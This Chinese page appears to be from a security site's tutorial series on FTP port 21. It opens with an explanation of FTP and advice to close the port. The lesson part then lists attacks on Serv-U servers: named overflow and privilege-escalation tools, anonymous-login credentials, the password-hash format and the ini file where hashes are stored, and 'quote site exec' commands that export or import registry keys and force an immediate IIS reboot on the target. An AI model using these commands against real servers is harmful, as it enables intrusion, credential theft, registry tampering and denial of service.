| 动画介绍:端口说明:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,可以采用匿名(anonymous)登录和授权用户名与密码登录两种方式登录FTP服务器。目前,通过FTP服务来实现文件的传输是互联网上上传、下载文件最主要的方法。另外,还有一个20端口是用于FTP数据传输的默认端口号。
搭建FTP服务有两种方式,在Windows中可以通过Internet信息服务(IIS)来提供FTP连接和管理,也可以单独安装FTP服务器软件来实现FTP功能,比如常见的FTP Serv-U。
操作建议:因为有的FTP服务器可以通过匿名登录,所以常常会被黑客利用。另外,21端口还会被一些木马利用,比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。如果不架设FTP服务器,建议关闭21端口。
本节课程的详细内容
======================================
1、Serv-U
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
2、匿名访问攻击
用户名:anonymous
密码:sis@15.com
3、FTP
对serv-u的MD5加密密码,共34位,头两位为随机产生,后32位为大写字母和数字。
密码存放在ServUDaemon.ini中
如:
[USER=123|1]
Password=wqDAC60889240F42E40EC8F34BBDAF5145
HomeDir=c:\
RelPaths=1
PasswordLastChange=1198582668
TimeOut=600
Access1=C:\|RWAMELCDP
执行命令
quote site exec
quote site exec "regedit -e C:\2.reg HKEY_LOCAL_MACHINE\SOFTWARE"
#导出软件信息
quote site exec "regedit -s C:\1.reg"
HKEY_LOCAL_MACHINE\SOFTWARE
OK.........
quote site exec "iisreset /reboot /timeout:00" #利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动..
| 
安全中国首页 > 动画中心 > 综合漏洞动画
